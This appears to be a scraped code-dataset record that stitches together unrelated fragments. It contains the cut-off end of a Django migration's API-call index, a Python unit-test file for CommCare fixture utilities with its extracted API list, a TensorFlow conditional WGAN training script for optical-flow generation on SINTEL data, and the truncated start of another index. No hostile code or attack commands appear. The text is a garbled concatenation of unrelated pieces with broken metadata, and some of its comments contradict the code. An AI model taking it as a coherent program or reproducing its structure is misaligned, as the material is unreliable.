'"""ID"""', 'serialize': '(False)', 'auto_created': '(True)', 'primary_key': '(True)'}), "(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)\n", (1044, 1121), False, 'from django.db import models, migrations\n'), ((1153, 1187), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), 
'(default=False)\n', (1172, 1187), False, 'from django.db import models, migrations\n'), ((1217, 1255), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""reviews.Review"""'}), "(to='reviews.Review')\n", (1234, 1255), False, 'from django.db import models, migrations\n'), ((1283, 1340), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': 'settings.AUTH_USER_MODEL', 'null': '(True)'}), '(to=settings.AUTH_USER_MODEL, null=True)\n', (1300, 1340), False, 'from django.db import models, migrations\n')] |
import doctest
from nose.tools import assert_equal, assert_true
from corehq.apps.fixtures.models import (
FieldList,
FixtureDataItem,
FixtureItemField,
)
from custom.abt.reports import fixture_utils
from custom.abt.reports.fixture_utils import (
dict_values_in,
fixture_data_item_to_dict,
)
def test_dict_values_in_param_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, None)
assert_true(result)
def test_dict_values_in_param_empty():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {})
assert_true(result)
def test_dict_values_in_value_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {'permutation': None})
assert_true(result)
def test_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='789abc',
properties={}
)
]
),
'name': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='John',
properties={'lang': 'en'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jan',
properties={'lang': 'nld'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jean',
properties={'lang': 'fra'}
),
]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': '789abc',
'name': 'John'
})
def test_empty_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[]
),
'name': FieldList(
doc_type='FieldList',
field_list=[]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': None,
'name': None,
})
def test_doctests():
results = doctest.testmod(fixture_utils)
assert results.failed == 0
| [
"corehq.apps.fixtures.models.FieldList",
"nose.tools.assert_true",
"custom.abt.reports.fixture_utils.dict_values_in",
"doctest.testmod",
"custom.abt.reports.fixture_utils.fixture_data_item_to_dict",
"nose.tools.assert_equal",
"corehq.apps.fixtures.models.FixtureItemField"
] | [((407, 436), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', 'None'], {}), '(swallow, None)\n', (421, 436), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((441, 460), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (452, 460), False, 'from nose.tools import assert_equal, assert_true\n'), ((556, 583), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', '{}'], {}), '(swallow, {})\n', (570, 583), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((588, 607), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (599, 607), False, 'from nose.tools import assert_equal, assert_true\n'), ((702, 748), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', "{'permutation': None}"], {}), "(swallow, {'permutation': None})\n", (716, 748), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((753, 772), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (764, 772), False, 'from nose.tools import assert_equal, assert_true\n'), ((2033, 2069), 'custom.abt.reports.fixture_utils.fixture_data_item_to_dict', 'fixture_data_item_to_dict', (['data_item'], {}), '(data_item)\n', (2058, 2069), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((2074, 2127), 'nose.tools.assert_equal', 'assert_equal', (['dict_', "{'id': '789abc', 'name': 'John'}"], {}), "(dict_, {'id': '789abc', 'name': 'John'})\n", (2086, 2127), False, 'from nose.tools import assert_equal, assert_true\n'), ((2560, 2596), 'custom.abt.reports.fixture_utils.fixture_data_item_to_dict', 'fixture_data_item_to_dict', (['data_item'], {}), '(data_item)\n', (2585, 2596), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((2601, 
2648), 'nose.tools.assert_equal', 'assert_equal', (['dict_', "{'id': None, 'name': None}"], {}), "(dict_, {'id': None, 'name': None})\n", (2613, 2648), False, 'from nose.tools import assert_equal, assert_true\n'), ((2709, 2739), 'doctest.testmod', 'doctest.testmod', (['fixture_utils'], {}), '(fixture_utils)\n', (2724, 2739), False, 'import doctest\n'), ((2325, 2371), 'corehq.apps.fixtures.models.FieldList', 'FieldList', ([], {'doc_type': '"""FieldList"""', 'field_list': '[]'}), "(doc_type='FieldList', field_list=[])\n", (2334, 2371), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((2439, 2485), 'corehq.apps.fixtures.models.FieldList', 'FieldList', ([], {'doc_type': '"""FieldList"""', 'field_list': '[]'}), "(doc_type='FieldList', field_list=[])\n", (2448, 2485), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1040, 1126), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""789abc"""', 'properties': '{}'}), "(doc_type='FixtureItemField', field_value='789abc',\n properties={})\n", (1056, 1126), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1368, 1464), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""John"""', 'properties': "{'lang': 'en'}"}), "(doc_type='FixtureItemField', field_value='John',\n properties={'lang': 'en'})\n", (1384, 1464), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1576, 1673), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""Jan"""', 'properties': "{'lang': 'nld'}"}), "(doc_type='FixtureItemField', field_value='Jan', properties\n ={'lang': 'nld'})\n", (1592, 1673), False, 'from 
corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1784, 1881), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""Jean"""', 'properties': "{'lang': 'fra'}"}), "(doc_type='FixtureItemField', field_value='Jean',\n properties={'lang': 'fra'})\n", (1800, 1881), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n')] |
import os, sys
sys.path.append(os.getcwd())
import time
import numpy as np
import tensorflow as tf
import tflib as lib
import tflib.ops.linear
import tflib.ops.conv2d
import tflib.ops.batchnorm
import tflib.ops.deconv2d
import tflib.save_images
import tflib.plot
import tflib.flow_handler as fh
import tflib.SINTELdata as sintel
# --- Hyperparameters and run configuration --------------------------------
MODE = 'wgan-gp' # Valid options are dcgan, wgan, or wgan-gp
DIM = 64 # Model dimensionality (channel multiplier for the conv stacks)
LAMBDA = 10 # Gradient penalty lambda hyperparameter (used by wgan-gp only)
CRITIC_ITERS = 5 # How many critic iterations per generator iteration
BATCH_SIZE = 64 # Batch size
ITERS = 100000 # How many generator iterations to train for
IM_DIM = 32 # number of pixels along x and y (square assumed)
SQUARE_IM_DIM = IM_DIM*IM_DIM # 32*32 = 1024 pixels per single-channel plane
OUTPUT_DIM = IM_DIM*IM_DIM*3 # Number of values per RGB frame (3*32*32)
OUTPUT_DIM_FLOW = IM_DIM*IM_DIM*2 # Number of values per uv flow field (2*32*32)
CONTINUE = False # Default False, set True if restoring from checkpoint
START_ITER = 0 # Default 0, set accordingly if restoring from checkpoint (100, 200, ...)
CURRENT_PATH = "sintel/flowcganuv5"
restore_path = "/home/linkermann/opticalFlow/opticalFlowGAN/results/" + CURRENT_PATH + "/model.ckpt"
# Log every config value defined above for reproducibility
lib.print_model_settings(locals().copy())
if(CONTINUE):
    # Clear any stale default graph before rebuilding and restoring from checkpoint
    tf.reset_default_graph()
def LeakyReLU(x, alpha=0.2):
    """Leaky rectifier: identity for positive inputs, alpha-scaled negatives."""
    return tf.maximum(x, x * alpha)
def ReLULayer(name, n_in, n_out, inputs):
    """Fully-connected layer (scoped as name + '.Linear') followed by a ReLU."""
    pre_activation = lib.ops.linear.Linear(name + '.Linear', n_in, n_out, inputs)
    return tf.nn.relu(pre_activation)
def LeakyReLULayer(name, n_in, n_out, inputs):
    """Fully-connected layer (scoped as name + '.Linear') followed by a leaky ReLU."""
    pre_activation = lib.ops.linear.Linear(name + '.Linear', n_in, n_out, inputs)
    return LeakyReLU(pre_activation)
def Generator(n_samples, conditions, noise=None):
    """Conditional generator: noise + two conditioning frames -> uv flow field.

    conditions : flat batch of two RGB frames, shape (n_samples, 2*OUTPUT_DIM).
    noise      : optional (n_samples, SQUARE_IM_DIM) tensor; sampled if None.
    Returns a flat flow tensor of shape (n_samples, OUTPUT_DIM_FLOW) in (-1, 1)
    from the final tanh.
    """
    if noise is None:
        noise = tf.random_normal([n_samples, SQUARE_IM_DIM])
    noise_plane = tf.reshape(noise, [n_samples, 1, IM_DIM, IM_DIM])
    # Conditioning input: two RGB frames stacked as 6 channels (NCHW)
    cond_planes = tf.reshape(conditions, [n_samples, 6, IM_DIM, IM_DIM])
    # Concatenate: noise becomes a seventh channel next to the conditioning frames
    net = tf.concat([noise_plane, cond_planes], 1)         # (n_samples, 7, IM_DIM, IM_DIM)
    net = tf.reshape(net, [n_samples, SQUARE_IM_DIM*7])    # flatten: 7 * 32 * 32 = 7168
    net = lib.ops.linear.Linear('Generator.Input', SQUARE_IM_DIM*7, 4*4*4*DIM, net)
    net = lib.ops.batchnorm.Batchnorm('Generator.BN1', [0], net)
    net = tf.nn.relu(net)
    net = tf.reshape(net, [-1, 4*DIM, 4, 4])
    net = lib.ops.deconv2d.Deconv2D('Generator.2', 4*DIM, 2*DIM, 5, net)
    net = lib.ops.batchnorm.Batchnorm('Generator.BN2', [0, 2, 3], net)
    net = tf.nn.relu(net)
    net = lib.ops.deconv2d.Deconv2D('Generator.3', 2*DIM, DIM, 5, net)
    net = lib.ops.batchnorm.Batchnorm('Generator.BN3', [0, 2, 3], net)
    net = tf.nn.relu(net)
    # Two output channels: the u and v flow components
    net = lib.ops.deconv2d.Deconv2D('Generator.5', DIM, 2, 5, net)
    net = tf.tanh(net)
    return tf.reshape(net, [-1, OUTPUT_DIM_FLOW])
def Discriminator(inputs, conditions):  # input conds as well
    """Conditional critic: score a flow field given its two conditioning frames.

    inputs     : flat uv flow fields, shape (batch, OUTPUT_DIM_FLOW).
    conditions : flat pair of RGB frames, shape (batch, 2*OUTPUT_DIM).
    Returns one unnormalized critic score per sample, shape (batch,).
    """
    inputs = tf.reshape(inputs, [-1, 2, IM_DIM, IM_DIM])      # flow has 2 channels (u, v)
    conds = tf.reshape(conditions, [-1, 6, IM_DIM, IM_DIM])   # two RGB frames -> 6 channels
    # Concatenate flow and conditioning frames along the channel axis
    ins = tf.concat([inputs, conds], 1)  # (batch, 8, IM_DIM, IM_DIM)
    output = lib.ops.conv2d.Conv2D('Discriminator.1', 8, DIM, 5, ins, stride=2)
    output = LeakyReLU(output)
    output = lib.ops.conv2d.Conv2D('Discriminator.2', DIM, 2*DIM, 5, output, stride=2)
    if MODE != 'wgan-gp':
        # wgan-gp must not use batchnorm in the critic (breaks the per-sample penalty)
        output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)
    output = LeakyReLU(output)
    output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DIM, 4*DIM, 5, output, stride=2)
    if MODE != 'wgan-gp':
        output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)
    output = LeakyReLU(output)
    # BUGFIX: after three stride-2 convs a 32x32 input is 4x4 with 4*DIM channels,
    # i.e. 4*4*4*DIM values per sample. The previous flatten size of 4*4*8*DIM
    # (left over from a removed fourth conv layer) silently packed TWO samples
    # into each row, so the critic emitted only BATCH_SIZE/2 scores.
    output = tf.reshape(output, [-1, 4*4*4*DIM])
    output = lib.ops.linear.Linear('Discriminator.Output', 4*4*4*DIM, 1, output)
    return tf.reshape(output, [-1])
# --- Graph inputs and model wiring ----------------------------------------
# Conditioning frames arrive as uint8-range ints; flow arrives as floats.
cond_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, 2*OUTPUT_DIM]) # cond input for G and D: two RGB frames per sample
cond_data = 2*((tf.cast(cond_data_int, tf.float32)/255.)-.5) # rescale [0,255] -> [-1,1]
#real_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW]) # real data is flow, dim 2!
real_data = tf.placeholder(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW]) # flow, already float and normalized [-1,1]
fake_data = Generator(BATCH_SIZE, cond_data)
disc_real = Discriminator(real_data, cond_data)  # critic score on ground-truth flow
disc_fake = Discriminator(fake_data, cond_data)  # critic score on generated flow
# Parameter lists for the two optimizers, selected by variable-name prefix
gen_params = lib.params_with_name('Generator')
disc_params = lib.params_with_name('Discriminator')
# --- Losses and train ops, selected by MODE --------------------------------
if MODE == 'wgan':
    # Original WGAN: critic maximizes the score gap; Lipschitz constraint
    # enforced by clipping critic weights after each update.
    gen_cost = -tf.reduce_mean(disc_fake)
    disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)

    gen_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(gen_cost, var_list=gen_params)
    disc_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(disc_cost, var_list=disc_params)

    clip_ops = []
    for var in disc_params:
        clip_bounds = [-.01, .01]
        clip_ops.append(
            tf.assign(
                var,
                tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
            )
        )
    clip_disc_weights = tf.group(*clip_ops)

elif MODE == 'wgan-gp':
    # Standard WGAN loss
    gen_cost = -tf.reduce_mean(disc_fake)
    disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)

    # Gradient penalty on random interpolates between real and fake flows
    alpha = tf.random_uniform(
        shape=[BATCH_SIZE,1],
        minval=0.,
        maxval=1.
    )
    differences = fake_data - real_data
    interpolates = real_data + (alpha*differences)
    gradients = tf.gradients(Discriminator(interpolates, cond_data), [interpolates])[0]  # critic is conditional
    slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
    gradient_penalty = tf.reduce_mean((slopes-1.)**2)
    disc_cost += LAMBDA*gradient_penalty

    gen_train_op = tf.train.AdamOptimizer(learning_rate=1e-4, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_params)
    disc_train_op = tf.train.AdamOptimizer(learning_rate=1e-4, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_params)

elif MODE == 'dcgan':
    # BUGFIX: since TF 1.0, tf.nn.sigmoid_cross_entropy_with_logits must be
    # called with named arguments (positional calls raise a ValueError), and
    # the legacy positional order was (logits-last) anyway. Use explicit
    # labels=/logits= keywords.
    gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.ones_like(disc_fake)))
    disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_fake, labels=tf.zeros_like(disc_fake)))
    disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=disc_real, labels=tf.ones_like(disc_real)))
    disc_cost /= 2.

    gen_train_op = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(gen_cost,
                                                                               var_list=lib.params_with_name('Generator'))
    disc_train_op = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(disc_cost,
                                                                                 var_list=lib.params_with_name('Discriminator.'))
# Dataset iterators: yield (frame batch, flow batch) pairs from SINTEL
gen = sintel.load_train_gen(BATCH_SIZE, (IM_DIM,IM_DIM,3), (IM_DIM,IM_DIM,2)) # batch size, frame size, flow size
dev_gen = sintel.load_test_gen(BATCH_SIZE, (IM_DIM,IM_DIM,3), (IM_DIM,IM_DIM,2))
# For generating samples: freeze one batch of noise and conditional input
fixed_cond_samples, fixed_flow_samples = next(gen) # cond samples shape (BATCH_SIZE, 3*OUTPUT_DIM)
fixed_cond_data_int = fixed_cond_samples[:,0:2*OUTPUT_DIM] # the two earlier frames serve as condition
fixed_real_data = fixed_flow_samples[:,OUTPUT_DIM_FLOW:] # later flow field for the critic; flow samples shape (BATCH_SIZE, 2*OUTPUT_DIM_FLOW) -- presumably; verify against loader
fixed_real_data_norm01 = tf.cast(fixed_real_data+1.0, tf.float32)/2.0 # [-1,1] -> [0,1]
fixed_cond_data_normalized = 2*((tf.cast(fixed_cond_data_int, tf.float32)/255.)-.5) # [0,255] -> [-1,1]
fixed_viz_data_int = fixed_cond_samples[:,OUTPUT_DIM:2*OUTPUT_DIM] # the later frame, kept for visualization
if(CONTINUE):
    # Reuse the noise variable stored in the checkpoint so samples stay comparable
    fixed_noise = tf.get_variable("noise", shape=[BATCH_SIZE, SQUARE_IM_DIM])
else:
    # Variable (not constant) so the noise gets saved with the model checkpoint
    fixed_noise = tf.Variable(tf.random_normal(shape=[BATCH_SIZE, SQUARE_IM_DIM], dtype=tf.float32), name='noise')
fixed_noise_samples = Generator(BATCH_SIZE, fixed_cond_data_normalized, noise=fixed_noise) # Generator(n_samples, conds, noise)
def generate_image(frame, true_dist): # generates 64 (batch-size) samples next to each other in one image!
print("Iteration %d : \n" % frame)
samples = session.run(fixed_noise_samples, feed_dict={real_data: fixed_real_data, cond_data_int: fixed_cond_data_int}) # output range (-1.0,1.0), size=(BATCH_SIZE, OUT_DIM)
#samples_255 = ((samples+1.)*(255./2)).astype('int32') #(-1,1) to [0,255] for displaying
samples_01 = ((samples+1.)/2.).astype('float32') # [0,1] is a np.ndarray shape (64, 2048)
# print(fixed_real_data_norm01.eval()) # shape (64, 2048) # bigger areas with (almost) same flow
images2show = fixed_viz_data_int.reshape(BATCH_SIZE,3,IM_DIM,IM_DIM)
sample_flowimages, real_flowimages = [], []
for i in range(0, BATCH_SIZE):
real_flowimg, flowimg = [],[] # reset to be sure
flowimg = fh.computeFlowImg(samples[i,:].reshape((IM_DIM,IM_DIM,2))) # (32, 32, 3) # now color img!! :)
flowimg_T = np.transpose(flowimg, [2,0,1]) # (3, 32, 32)
# flowimage = flowimage_T.reshape((OUTPUT_DIM,)) # instead of flatten?
sample_flowimages.append(flowimg_T)
real_uvflow = fixed_real_data[i,:]
real_uvflow = real_uvflow.reshape((IM_DIM,IM_DIM,2))
real_flowimg = fh.computeFlowImg(real_uvflow) # (32, 32, 3) color img!
real_flowimg = real_flowimg.reshape(IM_DIM,IM_DIM,3).astype('int32') # (32, 32, 3)
real_flowimg_T = np.transpose(real_flowimg, [2,0,1]) # (3, 32, 32)
real_flowimages.append(real_flowimg_T) # or which one? # also save as .flo?
images2show = np.insert(images2show, i*2+1, flowimg_T, axis=0)
#samples_255[2*i+1,:] = flowimage # sample flow color image
# images2show.shape: (128, 3, 32, 32) = (2*BATCH_SIZE, 3, IM_DIM, IM_DIM)
# images.reshape((2*BATCH_SIZE, 3, IM_DIM, IM_DIM))
lib.save_images.save_images(images2show, 'samples_{}.jpg'.format(frame))
sample_flowims_np = np.asarray(sample_flowimages, np.int32)
real_flowims_np = np.asarray(real_flowimages, np.int32)
sample_flowims = tf.convert_to_tensor(sample_flowims_np, np.int32)
real_flowims = tf.convert_to_tensor(real_flowims_np, np.int32) # turn into tensor to reshape later
# tensor = tf.constant(np_array) # another way to create a tensor
# compare generated flow to real one # float..?
# u-v-component wise
real = tf.reshape(fixed_real_data_norm01, [BATCH_SIZE,IM_DIM,IM_DIM,2]) # use tf.reshape! Tensor! batch!
real_u = tf.slice(real, [0,0,0,0], [real.get_shape()[0],real.get_shape()[1],real.get_shape()[2], 1])
real_v = tf.slice(real, [0,0,0,1], [real.get_shape()[0],real.get_shape()[1],real.get_shape()[2], 1])
pred = tf.reshape(samples_01,[BATCH_SIZE,IM_DIM,IM_DIM,2]) # use tf reshape!
pred_u = tf.slice(pred, [0,0,0,0], [pred.get_shape()[0],pred.get_shape()[1],pred.get_shape()[2], 1])
pred_v = tf.slice(pred, [0,0,0,1], [pred.get_shape()[0],pred.get_shape()[1],pred.get_shape()[2], 1]) # shape (64, 32, 32) all of them
# mse & ssim on components
mseval_per_entry_u = tf.keras.metrics.mse(real_u, pred_u) # on gray, on [0,1], (64,32,32), small vals (^-1,-2,-3)
mseval_u = tf.reduce_mean(mseval_per_entry_u, [1,2]) # shape (64,) # diff numbers
mseval_per_entry_v = tf.keras.metrics.mse(real_v, pred_v) # on gray, on [0,1], (64,32,32), small vals (^-1,-2,-3)
mseval_v = tf.reduce_mean(mseval_per_entry_v, [1,2]) # shape (64,) # diff than per u entry
#ssimval_u = tf.image.ssim(real_u, pred_u, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,)
#ssimval_v = tf.image.ssim(real_v, pred_v, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,) # also minus vals, around 0, u and v differ
# avg: add and divide by 2
mseval_uv = tf.add(mseval_u, mseval_v) # tf.cast neccessary?
tensor2 = tf.constant(2.0, shape=[64])
#ssimval_uv = tf.add(ssimval_u, ssimval_v) # (64,)
mseval_uv = tf.div(mseval_uv, tensor2)
#ssimval_uv = tf.div(ssimval_uv, tensor2) # (64,), small around 0, up to 0.3 after first 100 iter
#ssimval_list_uv = ssimval_uv.eval() # to numpy array # (64,)
mseval_list_uv = mseval_uv.eval() # (64,)
print("mseval uv")
print(mseval_list_uv)
#print("ssimval uv")
#print(ssimval_list_uv)
# flow color ims to gray
real_flowims = tf.cast(real_flowims, tf.float32)/255. # to [0,1]
real_color = tf.reshape(real_flowims, [BATCH_SIZE,IM_DIM,IM_DIM,3])
real_gray = tf.image.rgb_to_grayscale(real_color) # tensor batch to gray; returns original dtype = float [0,1]
# print("real gray") # (64, 32, 32, 1)
sample_flowims = tf.cast(sample_flowims, tf.float32)/255. # to [0,1]
pred_color = tf.reshape(sample_flowims, [BATCH_SIZE,IM_DIM,IM_DIM,3]) # use tf.reshape! Tensor! batch!
pred_gray = tf.image.rgb_to_grayscale(pred_color) # (64, 32, 32, 1)
# mse & ssim on grayscale
mseval_per_entry_rgb = tf.keras.metrics.mse(real_gray, pred_gray) # on grayscale, on [0,1]..
mseval_rgb = tf.reduce_mean(mseval_per_entry_rgb, [1,2])
#ssimval_rgb = tf.image.ssim(real_gray, pred_gray, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,)
#ssimval_list_rgb = ssimval_rgb.eval() # to numpy array # (64,)
mseval_list_rgb = mseval_rgb.eval() # (64,)
print("mseval rgb")
print(mseval_list_rgb)
#print("ssimval rgb")
#print(ssimval_list_rgb)
# print(ssimval_list)
# print(mseval_list)
for i in range (0,3):
#lib.plot.plot('SSIM uv for sample %d' % (i+1), ssimval_list_uv[i])
#lib.plot.plot('SSIM rgb for sample %d' % (i+1), ssimval_list_rgb[i])
lib.plot.plot('MSE uv for sample %d' % (i+1), mseval_list_uv[i])
lib.plot.plot('MSE rgb for sample %d' % (i+1), mseval_list_rgb[i])
print("sample %d \t MSE: %.5f \t %.5f\r\n" % (i, mseval_list_uv[i], mseval_list_rgb[i]))
#SSIM: %.5f \t %.5f\r\n" % (i, mseval_list_uv[i], mseval_list_rgb[i], ssimval_list_uv[i], ssimval_list_rgb[i]))
init_op = tf.global_variables_initializer() # op to initialize the variables.
saver = tf.train.Saver() # ops to save and restore all the variables.
# Train loop
with tf.Session() as session:
if(CONTINUE):
# Restore variables from disk.
saver.restore(session, restore_path)
print("Model restored.")
lib.plot.restore(START_ITER) # does not fully work, but makes plots start from newly started iteration
else:
session.run(init_op)
for iteration in range(START_ITER, ITERS): # START_ITER: 0 or from last checkpoint
start_time = time.time()
# Train generator
if iteration > 0:
_data, _ = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument not needed
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier frames as conditional data, # flow for disc not needed here
_ = session.run(gen_train_op, feed_dict={cond_data_int: _cond_data})
# Train critic
if MODE == 'dcgan':
disc_iters = 1
else:
disc_iters = CRITIC_ITERS
for i in range(disc_iters):
_data, _flow = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier 2 frames as conditional data,
_real_data = _flow[:,OUTPUT_DIM_FLOW:] # later flow as real data for discriminator
_disc_cost, _ = session.run([disc_cost, disc_train_op], feed_dict={real_data: _real_data, cond_data_int: _cond_data})
if MODE == 'wgan':
_ = session.run(clip_disc_weights)
lib.plot.plot('train disc cost', _disc_cost)
lib.plot.plot('time', time.time() - start_time)
# Calculate dev loss and generate samples every 100 iters
if iteration % 100 == 99:
dev_disc_costs = []
_data, _flow = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier 2 frames as conditional data
_real_data = _flow[:,OUTPUT_DIM_FLOW:] # later flow as real data for discriminator
_dev_disc_cost = session.run(disc_cost, feed_dict={real_data: _real_data, cond_data_int: _cond_data})
dev_disc_costs.append(_dev_disc_cost)
lib.plot.plot('dev disc cost', np.mean(dev_disc_costs))
generate_image(iteration, _data)
# Save the variables to disk.
save_path = saver.save(session, restore_path)
print("Model saved in path: %s" % save_path)
# chkp.print_tensors_in_checkpoint_file("model.ckpt", tensor_name='', all_tensors=True)
# Save logs every 100 iters
if (iteration < 5) or (iteration % 100 == 99):
lib.plot.flush()
lib.plot.tick()
| [
"tensorflow.div",
"tflib.plot.plot",
"tensorflow.get_variable",
"tensorflow.tanh",
"tensorflow.group",
"tflib.ops.linear.Linear",
"tflib.ops.deconv2d.Deconv2D",
"tensorflow.reduce_mean",
"tensorflow.ones_like",
"tensorflow.cast",
"numpy.mean",
"tensorflow.random_normal",
"tflib.ops.conv2d.Co... | [((4611, 4671), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32'], {'shape': '[BATCH_SIZE, 2 * OUTPUT_DIM]'}), '(tf.int32, shape=[BATCH_SIZE, 2 * OUTPUT_DIM])\n', (4625, 4671), True, 'import tensorflow as tf\n'), ((4908, 4971), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[BATCH_SIZE, OUTPUT_DIM_FLOW]'}), '(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW])\n', (4922, 4971), True, 'import tensorflow as tf\n'), ((5163, 5196), 'tflib.params_with_name', 'lib.params_with_name', (['"""Generator"""'], {}), "('Generator')\n", (5183, 5196), True, 'import tflib as lib\n'), ((5211, 5248), 'tflib.params_with_name', 'lib.params_with_name', (['"""Discriminator"""'], {}), "('Discriminator')\n", (5231, 5248), True, 'import tflib as lib\n'), ((7640, 7715), 'tflib.SINTELdata.load_train_gen', 'sintel.load_train_gen', (['BATCH_SIZE', '(IM_DIM, IM_DIM, 3)', '(IM_DIM, IM_DIM, 2)'], {}), '(BATCH_SIZE, (IM_DIM, IM_DIM, 3), (IM_DIM, IM_DIM, 2))\n', (7661, 7715), True, 'import tflib.SINTELdata as sintel\n'), ((7758, 7832), 'tflib.SINTELdata.load_test_gen', 'sintel.load_test_gen', (['BATCH_SIZE', '(IM_DIM, IM_DIM, 3)', '(IM_DIM, IM_DIM, 2)'], {}), '(BATCH_SIZE, (IM_DIM, IM_DIM, 3), (IM_DIM, IM_DIM, 2))\n', (7778, 7832), True, 'import tflib.SINTELdata as sintel\n'), ((14938, 14971), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (14969, 14971), True, 'import tensorflow as tf\n'), ((15016, 15032), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (15030, 15032), True, 'import tensorflow as tf\n'), ((31, 42), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (40, 42), False, 'import os, sys\n'), ((1332, 1356), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (1354, 1356), True, 'import tensorflow as tf\n'), ((1398, 1422), 'tensorflow.maximum', 'tf.maximum', (['(alpha * x)', 'x'], {}), '(alpha * x, x)\n', (1408, 1422), True, 'import tensorflow as tf\n'), 
